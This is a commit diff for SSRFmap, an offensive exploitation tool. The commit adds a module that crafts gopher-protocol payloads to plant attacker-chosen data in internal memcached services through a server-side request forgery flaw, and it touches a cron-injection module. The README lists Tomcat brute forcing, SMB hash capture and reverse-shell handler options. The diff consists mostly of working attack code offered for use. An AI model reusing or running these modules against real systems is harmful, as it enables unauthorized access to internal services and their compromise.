MODULE - Memcache store data

pull/18/head
Swissky 2019-07-08 23:46:48 +02:00
parent d57cbcce98
commit da86cab442
5 changed files with 74 additions and 24 deletions

View File

@ -39,6 +39,7 @@ The following modules are already implemented and can be used with the `-m` argu
| `smbhash` | Force an SMB authentication via a UNC Path | | `smbhash` | Force an SMB authentication via a UNC Path |
| `tomcat` | Bruteforce attack against Tomcat Manager | | `tomcat` | Bruteforce attack against Tomcat Manager |
| `custom` | Send custom data to a listening service, e.g: netcat | | `custom` | Send custom data to a listening service, e.g: netcat |
| `memcache` | Store data inside the memcache instance |
## Install and Manual ## Install and Manual
@ -46,26 +47,27 @@ The following modules are already implemented and can be used with the `-m` argu
Basic install from the Github repository. Basic install from the Github repository.
```powershell ```powershell
git clone https://github.com/swisskyrepo/SSRFmap $ git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/ $ cd SSRFmap/
pip3 install -r requirements.txt $ pip3 install -r requirements.txt
python3 ssrfmap.py $ python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER] usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
[--lhost LHOST] [--lport LPORT] [--uagent USERAGENT] [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
[--ssl [SSL]] [--level [LEVEL]] [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
optional arguments: optional arguments:
-h, --help show this help message and exit -h, --help show this help message and exit
-r REQFILE SSRF Request file -r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target -p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable -m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell -l HANDLER Start an handler for a reverse shell
--lhost LHOST LHOST reverse shell -v [VERBOSE] Enable verbosity
--lport LPORT LPORT reverse shell --lhost LHOST LHOST reverse shell
--uagent USERAGENT User Agent to use --lport LPORT LPORT reverse shell
--ssl [SSL] Use HTTPS without verification --uagent USERAGENT User Agent to use
--level [LEVEL] Level of test to perform (1-5, default: 1) --ssl [SSL] Use HTTPS without verification
--level [LEVEL] Level of test to perform (1-5, default: 1)
``` ```
## Examples ## Examples

View File

@ -14,10 +14,17 @@ class exploit():
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info("Module '{}' launched !".format(name))
gen_host = gen_ip_list("127.0.0.1", args.level) gen_hosts = gen_ip_list("127.0.0.1", args.level)
SERVICE_PORT = input("Service Port: ") self.SERVICE_PORT = input("Service Port: ")
SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: ")) self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
for SERVICE_IP in gen_host: for gen_host in gen_hosts:
payload = wrapper_gopher(SERVICE_DATA, SERVICE_IP, SERVICE_PORT) payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
r = requester.do_request(args.param, payload)
if args.verbose == True:
logging.info("Generated payload : {}".format(payload))
r = requester.do_request(args.param, payload)
if args.verbose == True:
logging.info("Module '{}' ended !".format(name))

34
modules/memcache.py Normal file
View File

@ -0,0 +1,34 @@
from core.utils import *
import urllib.parse
import logging
name = "memcache"
description = "Store data inside the memcache instance"
author = "Swissky"
documentation = []
class exploit():
SERVICE_IP = "127.0.0.1"
SERVICE_PORT = "11211"
SERVICE_DATA = "\r\n"
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
gen_host = gen_ip_list("127.0.0.1", args.level)
payload = input("Data to store: ")
self.SERVICE_DATA += 'set payloadname 0 0 {}\r\n'.format(len(payload))
self.SERVICE_DATA += '{}\r\n'.format(payload)
self.SERVICE_DATA += 'quit\r\n'
self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA)
for SERVICE_IP in gen_host:
payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT)
if args.verbose == True:
logging.info("Generated payload : {}".format(payload))
r = requester.do_request(args.param, payload)
if args.verbose == True:
logging.info("Module '{}' ended !".format(name))

View File

@ -45,9 +45,15 @@ class exploit():
payload = payload.replace("SERVER_CRON", self.SERVER_CRON) payload = payload.replace("SERVER_CRON", self.SERVER_CRON)
payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD)) payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
if args.verbose == True:
logging.info("Generated payload : {}".format(payload))
# Send the payload # Send the payload
r = requester.do_request(args.param, payload) r = requester.do_request(args.param, payload)
if args.verbose == True:
logging.info("Module '{}' ended !".format(name))
""" """
TODO: TODO:
This exploit only works if you have control over a cron file. This exploit only works if you have control over a cron file.

View File

@ -29,6 +29,7 @@ def parse_args():
parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target") parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable") parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell") parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell")
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell") parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell") parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use") parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")